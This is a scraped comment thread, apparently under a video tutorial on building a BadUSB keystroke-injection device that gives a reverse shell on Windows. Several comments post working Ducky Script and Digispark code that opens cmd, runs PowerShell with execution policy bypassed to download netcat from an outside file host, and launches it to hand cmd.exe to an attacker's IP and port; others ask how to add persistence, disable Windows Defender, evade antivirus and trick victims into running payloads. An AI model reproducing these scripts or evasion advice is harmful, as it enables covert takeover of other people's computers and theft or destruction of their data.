Dude you're doing really good videos and really easy to follow along really helping train the next gen of hackers to use what they can afford and doing some diy along the way
If anyone is watching this in 2020, this is detected by even windows defender, a solution would be to add a command to the script that makes it disable windows defender and then does the other commands to get you a shell without having to make your own payload
Hey man good work. You have been constantly uploading quality content you definitely deserve all those subs :) keep up your good work and your bound to keep getting more and more of the subs you deserve.
Hi! loving your content. if i may ask some questions, 1. Could you make a video detailing about how to perform that attack thru WAN Network(Port Forwarding and stuffs), because i don't really get it how it works, i've been watching and reading many tutorials in the internet,they are sometime have different method which makes me confuse about how it really works. 2. Could you make that reverse shell persistence? as victim restart his/her computer it will run automatically. 3. Is that reverse shell Antivirus-proof? 4. If the victim has not connected to the internet yet, is that reverse shell will automatically work when the victim is connected to the internet? 5. i'm just wondering, why didn't you use msfconsole instead of netcat? Sorry for asking so much questions, i hope you don't mind
1) It's different for every router, as long as you can portforward on the listener then you're good to go. 2) It is possible, yes 3) It will be detected under some antivirus, check virus total. 4) I wouldn't think so 5) I already know how to use netcat :P
r1Ns3 ZTE F660, i know how to set port forward in router. But i have no idea how the victim could connect back to me even tho we're not in the Local Network
wow found your vids the other day and now you got me as a full time subscriber and the Field Kit you mentioned i dont think they sell those anymore i went to there site and it wasnt there
Everything working good except the nc port listener shows nothing ;( I'm using a VirtualMachine (Kali Linux) . Both computers must be on same network ?
I'm still pretty nooby here, so excuse me if this is an obvious answer, but once the target computer shuts down would the shell still be available when you boot up the next time? Or is there a way to add it to the "startup" processes? I would assume doing that you would need to have the resource files copied onto the target PC? Thanks for all the great content :)
Hello i think that you probably already got tthe anwser if not: is the terminal on the attackers machine will close or the one off the victom you will lose the shell you could download a scrript that automaticly executes in the background when you got the shell though i dont know if it exists somewhere you probably need to make your own
Hello great blog , what do you think about this "CJMCU - virtual Keyboard Badusb USB TTF memory Keyboard ATMEGA32U4 module" as Arduino Rubber Ducky microSD?
Say you're at your target's PC, could you just plug it in, wait a couple seconds and then pull it out, or would you have to have the USB plugged in all the whole time to get a continuous reverse shell?
Yes, so essentially once you get control over cmd, you have complete control (privileges equivalent to that of the user you have control over), so then you are free to download/install/copy files/delete files, anything you want really.
so I'm kinda late to this but to my knowledge wget doesn't come pre-installed with Windows. If you don't have it installed on the target computer will the script still work?
Really enjoying your content, I just wanted to clear something up. I have a teensy 3.2, and I'm having a lot of fun with it. In another comment you said the original ducky was faster yet the ducky has a 60mhz processor while the teensy has a 96 MHz processor. So in theory, wouldn't it be faster?
Seytonic Alright thanks :) It's really nice to see youtubers who put hard work into their videos blow up and become successful. Jackktutorials and Seytonic are officially my favourite channels.
Hey, I have uploaded the script to the pro micro and it ran just fine, but... when it wrote the second command with the " /MIN a.exe (and so on) " it wrote a " - " instead of " / ". I don't know why and when I upload the script it's all right, and instead of " - " I get " + ", so I don't know what to do, and I even searched it up on google with no luck :(
I got it to work, but I had to replace the " / " with a " & ". And instead of " - " I had to replace them with " + ", I think I know why, but I might be wrong, and it can be that the pro micro is using a english keyboard while my OS is using norwegian keyboard language, but I don't know why, I hade a similar problem with kali linux and that was because of the keyboard language, hmmm
Har ikke fått den til å funke helt, fortsatt en del symbola som må endres på, de endres på i ei fil. Eneste problemet e at d e så knødd å finne ut kordan koda som e før akkurat d symbolet
I did everything you said, but I keep getting an error saying 'Unsupported 16-Bit Application' and it halts netcat from running. Am I doing something wrong, or what?
Seytonic Would it run if i make a .bat file with the same script(not for ducky), with a long delay at the start, then put the shell file and bat file on usb? and is it a good idea to use autorun also?
I improved it a bit so it deletes the files afterwards when closing the netcat connection. I also download the nc.exe from the device which is listening with an apache. Pretty cool thing tbh, thank you
so i have this board however I dont see it in device manager anywhere. i hear it when i plug it in but no com port anything like that anywhere. i have windows 10.. what can i do
Please help me! I did everything he did, but my Board isnt detected by the Arduino IDE. In the device Manager it says "Arduino Leonardo" and the device is blinkin red so I think it cant be broken. Please help me as soon as you see this comment. Thanks!
im using a swedish layout and I can't get it to work it just replaces some special symbols and I have tried changing the symbols to there american layout place but it just changes the symbols to some other symbols plz help. :(
I know this video is fairly old now, but I've adapted your reverse shell script to work with the P4wnP1 A.L.O.A and I'm having an issue with the wget command. It seems that the ssl version PowerShell uses by default is SSL 1.0 and the hosting site requires 1.2, how would I change the script to use ssl 1.2?
so i got that issue figured out, just a line in the script upgrading from the default of tls 1.0 to tls 1.2, however, as other commenters have mentioned, a.exe is corrupted. gonna try reuploading and updating the script with the new link.
Rendall Port forwarding makes it so that connecting to a network externally on a certain port will pass your connection through to a local IP. if you plan on using this rat on a computer other than one on the same network as your c&c server you would need to forward the port your server is listening on to its IP address. in his case for the last bit there wasn't any port forward used because he was connecting to the computer when they were on the same network so he used the local IP. notice that it had 4 octets rather than 5.
Michal Monday you mean if we pre-activate the switch? But then they could themselves deactivate it just to see what it does or the switch could be deactivated by acctident
File a.exe downloaded already damaged. Has anyone encountered such a problem? I think the whole point is that there is too little time to download the file, but I changed the code and increased the download time, nothing changes
Everything works but there is only one problem, I don't have administrator rights. This result in getting the "access denied" in some commands. Is there a way to give netcat administrator rights?
Heyyyyy. I have a question. I tried to execute the following: DELAY 3000 STRING HELLO Output: "HELOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO" (unlimited O's) How can I fix unlimited O's and the missing L? When I try to execute: DELAY 3000 GUI r Then it's only pressing the Windows key. Help...
When i try compling im getting that message: Arduino: 1.8.2 (Windows 7), Board: "Digispark (Default - 16.5mhz)" In file included from D:\digisprk\sketch_mar29a\sketch_mar29a.ino:1:0: D:\New folder\Arduino\libraries\Keyboard\src/Keyboard.h:25:17: fatal error: HID.h: No such file or directory #include "HID.h" ^ compilation terminated. exit status 1 Error compiling for board Digispark (Default - 16.5mhz). This report would have more information with "Show verbose output during compilation" option enabled in File -> Preferences.
your using a DigiSpark, DigiSpark rubberducky's usually use DigiKeyboard.h library instead of HID.h. But you included HID.h, which is the wrong library. And you need to edit the script, like so: #include "DigiKeyboard.h" void setup() { DigiKeyboard.update(); DigiKeyboard.sendKeyStroke(0); DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); DigiKeyboard.delay(100); DigiKeyboard.print(F("cmd")); DigiKeyboard.sendKeyStroke(KEY_ENTER); DigiKeyboard.delay(100); DigiKeyboard.print(F("cd / & mkdir win & cd win & echo (wget 'NETCAT_DL_LINK' -OutFile a.exe) > b.PS1 & powershell -ExecutionPolicy ByPass -File b.ps1")); DigiKeyboard.sendKeyStroke(KEY_ENTER); DigiKeyboard.delay(50); DigiKeyboard.print(F("START /MIN a.exe IP PORT -e cmd.exe -d & exit")); DigiKeyboard.sendKeyStroke(KEY_ENTER); } void loop() {}
You need to interface with the computer to get the reverse shell. Whether thats by tricking someone to opening a malicious exe or by a rubber ducky that's up to you.
could you catch the reverse shell with Metasploit and use the shell to meterpreter tool to elevate your privileges. I'm new to this hacking stuff so any replies would help!
"Lets just go full minecraft on this, 25565 hahahahah" Nice mate.. love ur vids
Dude you're doing really good videos and really easy to follow along really helping train the next gen of hackers to use what they can afford and doing some diy along the way
If anyone is watching this in 2020, this is detected by even windows defender, a solution would be to add a command to the script that makes it disable windows defender and then does the other commands to get you a shell without having to make your own payload
What command would you suggest
the system cannot execute the specified program.
manually:
C:\win\a.exe
the file or directory is corrupted and unreadable.
how do i fix this ?
same problem did u already fix it?
I’d just use a different rev shell. Maybe a cURL one?
yes same here would really appreciate some help
Same problem, even google dosent know the answer
i wanna know how to fix it too
Nice video. Was waiting for this :) Can't wait for the poisontap.
Hey man good work. You have been constantly uploading quality content you definitely deserve all those subs :) keep up your good work and your bound to keep getting more and more of the subs you deserve.
:)
I've been watching since your first video
Hey how can I convert code for arduino that site is ofline please help
because the script dose not exist on his sight
DELAY 400
GUI r
DELAY 100
STRING cmd
ENTER
DELAY 100
STRING cd / & mkdir /win & cd / win & echo (wget -OutFile a.exe) >
b.PS1 & powershell - ExecutionPolicy ByPass -File b.ps1
ENTER
DELAY 50
STRING START /MIN a.exe -e cmd.exe -d & exit
ENTER
tysm
Hi! loving your content. if i may ask some questions,
1. Could you make a video detailing about how to perform that attack thru WAN Network(Port Forwarding and stuffs), because i don't really get it how it works, i've been watching and reading many tutorials in the internet,they are sometime have different method which makes me confuse about how it really works.
2. Could you make that reverse shell persistence? as victim restart his/her computer it will run automatically.
3. Is that reverse shell Antivirus-proof?
4. If the victim has not connected to the internet yet, is that reverse shell will automatically work when the victim is connected to the internet?
5. i'm just wondering, why didn't you use msfconsole instead of netcat?
Sorry for asking so much questions, i hope you don't mind
1) It's different for every router, as long as you can portforward on the listener then you're good to go. 2) It is possible, yes 3) It will be detected under some antivirus, check virus total. 4) I wouldn't think so 5) I already know how to use netcat :P
ridwan, what trouble are you having with port forwarding?
r1Ns3 literally everything. Every tutorial i have read/watched perform different steps,thus i have no idea how it works
what type of router do you have? do you know?
r1Ns3 ZTE F660, i know how to set port forward in router. But i have no idea how the victim could connect back to me even tho we're not in the Local Network
wow found your vids the other day and now you got me as a full time subscriber and the Field Kit you mentioned i dont think they sell those anymore i went to there site and it wasnt there
As far as I know they are going to start selling them again very soon.
Seytonic okay great i was dissapointed because i thought it was a limited time thing and missed out
Everything working good except the nc port listener shows nothing ;(
I'm using a VirtualMachine (Kali Linux) .
Both computers must be on same network ?
yes, both on the same network (2 years later)
@@adispenser lmao you're here too?
@@smixii5233 im here trying to figure out why cant my computer find a.exe
I'm still pretty nooby here, so excuse me if this is an obvious answer, but once the target computer shuts down would the shell still be available when you boot up the next time? Or is there a way to add it to the "startup" processes? I would assume doing that you would need to have the resource files copied onto the target PC? Thanks for all the great content :)
Hello i think that you probably already got tthe anwser if not: is the terminal on the attackers machine will close or the one off the victom you will lose the shell you could download a scrript that automaticly executes in the background when you got the shell though i dont know if it exists somewhere you probably need to make your own
FINALLY, I GOT IT WORKING!! I HAD TO TWEAK THE CODE A BIT BUT IT WORKS PERFECTLY! I WAS ABLE TO DO IT IN ABOUT 5 SECONDS!!!
Fantasaic Productions what did you do? Mine does NOT work and i dont know what i am doing wrong
What'd you tweak?
Can you do a video on actually doing stuff with the reverse shell?
@@GeneralDenmark yup, but what I do, is I start chrome on a specific link with a scary picture, cuz I dint out malware on people's computer
Just Walter to say, love your vids man :)
Wanted*
;)
Whenever I type anything into netcat from my windows machine, it immediately closes after I type anything into the terminal. Help?
whats a reverse shell
Can u give me the link of the bad usb because in discription i am not getting
do you need admin to reverse shell?
Hello great blog , what do you think about this "CJMCU - virtual Keyboard Badusb USB TTF memory Keyboard ATMEGA32U4 module" as Arduino Rubber Ducky microSD?
For reverse shells you don’t have to do anything with python networking?
When I click the link to buy all the used stuff, it presents four unique products. Which one is the BadUSB? And which one is the best model to buy?
hey just a quick question, is this script/file small enough to fit in a digispark?
What is a good terminal emulator?
did u used digispark with the nano arduino ?
Does this work with computers on outside networks?
Ive been trying to do this with the digispark attiny85 board, and i simply cant get it to work for whatever reason
//got it to work:
#include "DigiKeyboard.h"
void setup() {
}
void loop() {
DigiKeyboard.sendKeyStroke(0);
DigiKeyboard.delay (500);
DigiKeyboard.sendKeyStroke(0, MOD_GUI_LEFT);
DigiKeyboard.delay(100);
DigiKeyboard.println("cmd");
DigiKeyboard.delay(100);
DigiKeyboard.println("cd / & mkdir win & cd win & echo (wget '1fichier.com/?6jls6tiohg' -OutFile a.exe) > b.PS1 & powershell -ExecutionPolicy ByPass -File b.ps1");
DigiKeyboard.delay(3000);
DigiKeyboard.println("START /MIN a.exe IP PORT -e cmd.exe -d & exit");
DigiKeyboard.delay(10000);
}
Do you know how i could use this with a different keyboard layout. I couldnt find a way to change it.
Say you're at your target's PC, could you just plug it in, wait a couple seconds and then pull it out, or would you have to have the USB plugged in all the whole time to get a continuous reverse shell?
U can plug it out :)
I'm not totally sure what the goal of this is. But as I have understood so far, you get control over his CMD?
Yes, so essentially once you get control over cmd, you have complete control (privileges equivalent to that of the user you have control over), so then you are free to download/install/copy files/delete files, anything you want really.
Does this work too when you're not in the same network?
so I'm kinda late to this but to my knowledge wget doesn't come pre-installed with Windows. If you don't have it installed on the target computer will the script still work?
Well done!I'm gonna try with digispark
Any luck so far? I'm thinking on buying a 3-pack
its only working on the same Network right?
Can I use a malduino Elite for this?
Yeah ofc
Oh wait im 3 years late
Really enjoying your content, I just wanted to clear something up. I have a teensy 3.2, and I'm having a lot of fun with it. In another comment you said the original ducky was faster yet the ducky has a 60mhz processor while the teensy has a 96 MHz processor. So in theory, wouldn't it be faster?
In regards to the teensy I haven't got one so I don't know. Though I haven't seen any noticeable difference in videos I've watched.
Seytonic Alright thanks :) It's really nice to see youtubers who put hard work into their videos blow up and become successful. Jackktutorials and Seytonic are officially my favourite channels.
What kind of os are you using
can it be used for Bad Ducky from github ..?
I don't think windows has wget installed on default only on linux
WIndows sp2 and higher does.
+Seytonic you're wrong, mate!
it is available in powershell
Hey, I have uploaded the script to the pro micro and it ran just fine, but... when it wrote the second command with the " /MIN a.exe (and so on) " it wrote a " - " instead of " / ". I don't know why and when I upload the script it's all right, and instead of " - " I get " + ", so I don't know what to do, and I even searched it up on google with no luck :(
I got it to work, but I had to replace the " / " with a " & ". And instead of " - " I had to replace them with " + ", I think I know why, but I might be wrong, and it can be that the pro micro is using a english keyboard while my OS is using norwegian keyboard language, but I don't know why, I hade a similar problem with kali linux and that was because of the keyboard language, hmmm
har samme problem... du har ikke lyst til å sende versjonen din her? jeg fatter ikke løsningen din.
Har ikke fått den til å funke helt, fortsatt en del symbola som må endres på, de endres på i ei fil. Eneste problemet e at d e så knødd å finne ut kordan koda som e før akkurat d symbolet
off... må nokk bare ta på meg byrden å kjøpe ei skikkelig rubber ducky /:
Ja, men ville nok vært verdt d å knø litt i fila, æ har ikke hatt tid, men vist andre har d så...
I did everything you said, but I keep getting an error saying 'Unsupported 16-Bit Application' and it halts netcat from running. Am I doing something wrong, or what?
Legoboylee hey a different version?
I got the same thing. You probably uploaded the zip file completely. However the video says you should only upload nc64.exe file.
do I put in my ipv4 address, subnet mask, or default gateway IP?
Seytonic Would it run if i make a .bat file with the same script(not for ducky), with a long delay at the start, then put the shell file and bat file on usb? and is it a good idea to use autorun also?
Auto run has to be enabled on the pc for a regular usb to work. A bad usb will work regardless
Whether can I download file from local storage of usb and not using wget to download it from internet?
hey , do you think we could do a poison tap like device using arduino or only raspi
Arduinos don't have the capability unfortunately.
Seytonic mhm......oki thx
Hello,
can you send me the source of the ducky converter of your site?
i want to try to make it for the 1 dollar ducky.
Follow the links on the converter to the github. I didn't make it.
thanks! ill report back if i made something!
And.... Did it work?
I improved it a bit so it deletes the files afterwards when closing the netcat connection. I also download the nc.exe from the device which is listening with an apache. Pretty cool thing tbh, thank you
One more question, Im new to using the arduino ide. How do i delete a script I upload to the malduino and upload a new one?
i m making mine using attiny85 and digispark bootloader and thus its really compact ;)
script is not available from the link
so i have this board however I dont see it in device manager anywhere. i hear it when i plug it in but no com port anything like that anywhere. i have windows 10.. what can i do
I have a problem about the code, the IDE said "cannot find keyboard"
Please help me! I did everything he did, but my Board isnt detected by the Arduino IDE. In the device Manager it says "Arduino Leonardo" and the device is blinkin red so I think it cant be broken. Please help me as soon as you see this comment. Thanks!
getting a reverse shell on a mac? is netcat mac applicable?
Probably not though I'm sure there are other ways.
netcat is installed by default on mac, use the nc command
Dude, is it possible to add a button to let execute the script when i press it?
Great job on the videos, keep it up.
im using a swedish layout and I can't get it to work it just replaces some special symbols and I have tried changing the symbols to there american layout place but it just changes the symbols to some other symbols plz help. :(
Work now?
I am trying to install and run backdoor that i made but microsoft defend delete it
What can i do to pypass it
I know this video is fairly old now, but I've adapted your reverse shell script to work with the P4wnP1 A.L.O.A and I'm having an issue with the wget command. It seems that the ssl version PowerShell uses by default is SSL 1.0 and the hosting site requires 1.2, how would I change the script to use ssl 1.2?
so i got that issue figured out, just a line in the script upgrading from the default of tls 1.0 to tls 1.2, however, as other commenters have mentioned, a.exe is corrupted. gonna try reuploading and updating the script with the new link.
@@typhyter6711 we're still waiting:D
Does the reverse shell persist after removing the badusb?
yes
But how do i put link there? Netcat is not just one *.exe file, it consists of many. Or i just put link to zip file from that site in description?
I was testing this with a kali vm, but it doesn't seem to work
When runs the last line an error appears: "The system cannot execute the specified program"
do I put the IP of the victim machine or the one of the attacker machine?
For the IP, is it your Kali machine's IP or is it something else? And can the port be random, or do you have to port forward it on your router?
Rendall Port forwarding makes it so that connecting to a network externally on a certain port will pass your connection through to a local IP. if you plan on using this rat on a computer other than one on the same network as your c&c server you would need to forward the port your server is listening on to its IP address. in his case for the last bit there wasn't any port forward used because he was connecting to the computer when they were on the same network so he used the local IP. notice that it had 4 octets rather than 5.
Evan Rusmisel okay yeah that makes sens, thank you! But the port can be a random one?
Rendall yea, but I would suggest using one in the thousands.
Evan Rusmisel alright thanks :)
Is there a way to upload the script to the Arduino without running it?
You could add a switch/button and adjust the code to be executed whenever you trigger it
www.arduino.cc/en/Tutorial/Button
they won't have to press anything if it's a switch
Michal Monday you mean if we pre-activate the switch? But then they could themselves deactivate it just to see what it does or the switch could be deactivated by acctident
you could cover it with a tape
Michal Monday presumably, yeah. But it would be impractical. BUT HECK, EH? Much better than buying a 50$ ducky. Thanks for the idea tho!
will this work on a Malduino if i use the converter on Seytonic's website also(malduino.com/converter/)?
Thanks a lot ! , I was really looking for this ..
Hello
Where i can find converter?
Something with more space?
Is this just on private networks, your Ip adress was from private scope
File a.exe downloaded already damaged. Has anyone encountered such a problem? I think the whole point is that there is too little time to download the file, but I changed the code and increased the download time, nothing changes
The script is no longer up
KEY_LEFT_ESC does not work with arduino what should i do instead?
KEY_ESC
nobody is probably going to read this but does it work over multiple wifi networks
Hi
Could you show us how to use a meterpreter reverse chell instead?
Meterpreter isn't something I've done much with just yet, though when I do I'll make a few videos on it.
its not working now...
i become the error a.exe doesnt exist
is this normal? pls help!
Help "-MIN" could be not found!
is this script still working?
/MIN not -MIN
Everything works but there is only one problem, I don't have administrator rights. This result in getting the "access denied" in some commands. Is there a way to give netcat administrator rights?
Not that I know of, you might want to do some searching on 'privilege escalation'.
Can i use an Arduino nano instead?
nope. the nano cant send keyboard comments
WHY?
the arduino USB Libraries only work on the (Leonardo, Micro, Due, Zero and Esplora)
How about using V-USB?
Heyyyyy. I have a question. I tried to execute the following:
DELAY 3000
STRING HELLO
Output: "HELOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO" (unlimited O's)
How can I fix unlimited O's and the missing L?
When I try to execute:
DELAY 3000
GUI r
Then it's only pressing the Windows key.
Help...
What BadUSB are you using?
@@dillon4868 I am using the Arduino Pro Micro
Will the same script work on a malduino? Thank you
Should do! Just make sure to convert it @ malduino.com
Wow! Thanks for the quick reply, I will try this out as soon as it arrives.
So I put the IP of my Linux machine or what?
yes, but it changes based on the local network you are connected to
does it work on windows10?!
Wich port do i need to put in!?
GeneralDenmark wow thank you!👍
can you make one for osx?
what if my laptop is super slow? will the script mess up if the run box doesn't appear within 400ms? lol
link is not found sir
When i try compling im getting that message: Arduino: 1.8.2 (Windows 7), Board: "Digispark (Default - 16.5mhz)"
In file included from D:\digisprk\sketch_mar29a\sketch_mar29a.ino:1:0:
D:\New folder\Arduino\libraries\Keyboard\src/Keyboard.h:25:17: fatal error: HID.h: No such file or directory
#include "HID.h"
^
compilation terminated.
exit status 1
Error compiling for board Digispark (Default - 16.5mhz).
This report would have more information with
"Show verbose output during compilation"
option enabled in File -> Preferences.
your using a DigiSpark, DigiSpark rubberducky's usually use DigiKeyboard.h library instead of HID.h. But you included HID.h, which is the wrong library. And you need to edit the script, like so:
#include "DigiKeyboard.h"
void setup()
{
DigiKeyboard.update();
DigiKeyboard.sendKeyStroke(0);
DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
DigiKeyboard.delay(100);
DigiKeyboard.print(F("cmd"));
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(100);
DigiKeyboard.print(F("cd / & mkdir win & cd win & echo (wget 'NETCAT_DL_LINK' -OutFile a.exe) > b.PS1 & powershell -ExecutionPolicy ByPass -File b.ps1"));
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(50);
DigiKeyboard.print(F("START /MIN a.exe IP PORT -e cmd.exe -d & exit"));
DigiKeyboard.sendKeyStroke(KEY_ENTER);
}
void loop() {}
i got error msg:
'/MIN' is not recognized as an internal or external command,
operable program or batch file
what can i do?
Hmm odd, what windows version are you using?
Windows 10 Home
I can't find the script anymore
wy arn't de links working
nice video, but the install driver when connect arduino to PC can be problem
What if the user reboot his PC after the reverse shell started
Is there a way to place the reverse shell exe on the victims computer with out using a rubber ducky or physical media?
Then you have to type in the commands by hand
But,how would you do that without reverse shell in the first place?
You need to interface with the computer to get the reverse shell. Whether thats by tricking someone to opening a malicious exe or by a rubber ducky that's up to you.
I followed the instructions but I get "the system cannot execute the specified program." Why is that?
check the size of the downloaded file to begin with. It might have downloaded a corrupted file
@@nikoskaravidas2307 it's been 2 years lmao i forgot i had a badusb
could you catch the reverse shell with Metasploit and use the shell to meterpreter tool to elevate your privileges. I'm new to this hacking stuff so any replies would help!